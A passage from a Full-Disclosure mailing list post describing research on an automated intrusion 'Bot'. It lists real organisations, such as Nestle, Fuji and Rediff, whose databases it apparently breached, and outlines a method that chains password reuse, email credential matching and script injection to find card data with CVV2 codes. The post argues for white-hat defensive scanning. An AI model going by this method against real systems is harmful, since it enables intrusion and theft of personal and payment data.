- 160 million hits per month global basketball portal for player promotion 
and exposure,
- One of Polish commercial email/web hosting company database,
- Rediff Portal system's database,
- an online-casino client account database,
- Computer share governance services,
- National Geographic's expeditions alliance company,
- An advertising network database system, serving 9 Billion ads on 1500+ web 
sites per month,
- Fuji client eSupport database,
- Dialogic corporation (IP, wireless and video solutions) client support 
database,
- Nestle corporation's database, Employee Benefit & learning subsystem,
- Australian business electronic messaging (SMS/MMS) provider,
- Event organizing and publishing company with 60+ yrs experience,
- Brasilian VoIP provider, client account database,
- International casting resource database for professional actors,

- few web hosting companies, including small and large business clients.
- numerous dating portals, including one major dating web engine,
- recruitment companies and job portal client databases (29 systems), 
including IT, health, law-enforcement and ex-military.




22. return -1
/////////////

I think there is no doubt that the process of search for the victim, seeking 
for vulnerable systems containing credit card numbers along with their CVV2 
codes, matching further system penetration entrypoints - even the whole 
process of an intrusion and subsequent system penetration: everything can be 
parametrized, mathematicaly described and finally automated using two 
things: a programming language and a machine. I guess, everybody's familiar 
with the fraze: the word is stronger than the sword, right? Well, I must say 
that sometimes I like to feel DWORD is twice stronger :)

Although different "friendly" robot-codes exist out there, helping us round 
the clock, like for example HTTP web crawlers building google search, there 
are also the bad guys. Obviously, the very same automation is being actively 
exploited by criminals to track the vulnerable faster and to exploit them 
quicker.

There is one more important thing to note about the whole project. As 
probably everyone has already noticed :) the whole Bot code DOES NOT 
implement any miraculous, new, 0day attack vector "discovery" - it's just a 
PLAIN combination of few human and software vulnerabilities which are just 
as old as probably the internet itself (password reusing, email credentials 
matching, script engine code injection). There are HUNDRETS of more advanced 
and more sophisticated automated and semi-automated tools and scripts doing 
probably better their job in comparison to every single particular Bot's 
part (segment) alone. The main target of this research was however the FULL 
automation, ie. binding all the "penetration phases" together and limiting 
as much as possible the human factor in the seek-probe-penetrate-analyse 
sequence.

In my opinion, the most disturbing observation of the research is the fact 
that the results can be accomplished easily by anyone out there just bored 
enough - sitting in home, after or in between a dailight job and/or without 
a budget. The question is: what are the capabilities of a potential criminal 
entity WITH the budget, unlimited research manpower and malicious goals. It 
would be really shortsighted to say that a fully automated codes of this 
kind - but emploing few times wider range of protocols and targeting 
different server side compromise technologies - aren't operational for a 
long time and under control of the darker shade underground.

Nevertheless, it's pretty obvious: one can not implement a PERFECT 
protection for our personal secret data - as we are the only holders and 
protectors of that secrets each other - all we can do is to EDUCATE, how to 
build them strong and handle them safely. Though, I guess it would be nice 
to see some movement around automated and semi-automated robot code projects 
implemented and operated by white hats this time, ACTIVELY targeting places 
that seriously weaken the global information infrastuture and open the 
users' personal ID information for theft.

I mean, the banks are are obliged to protect the money of their customers by 
following specific protocols which are developed and validated externaly 
through apriopriate audit procedures, right?
Is it then a hard one, to imagine an automated or semi automated system, 
working more or less like a country-wide cyber security sonar, that would be 
able to pinpoint and instantialy alert apriopriate response/tech-support 
organizations, about those specific "identity data bank" web applications 
and systems which CAN'T and WON'T protect our sensitive secrets - passwords, 
keys, CC data and IDs?
And all because of a single programmers flaw, which exploited by an attacker 
compromises our electronic security instantly.

Anyway, theory is one, reality is another...



Thx and Greetz: SIN, Sl4uGh7eR, Vo0, Andrui, Mario, Rothrin.

By porkythepig.
porkythepig@...t.pl

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/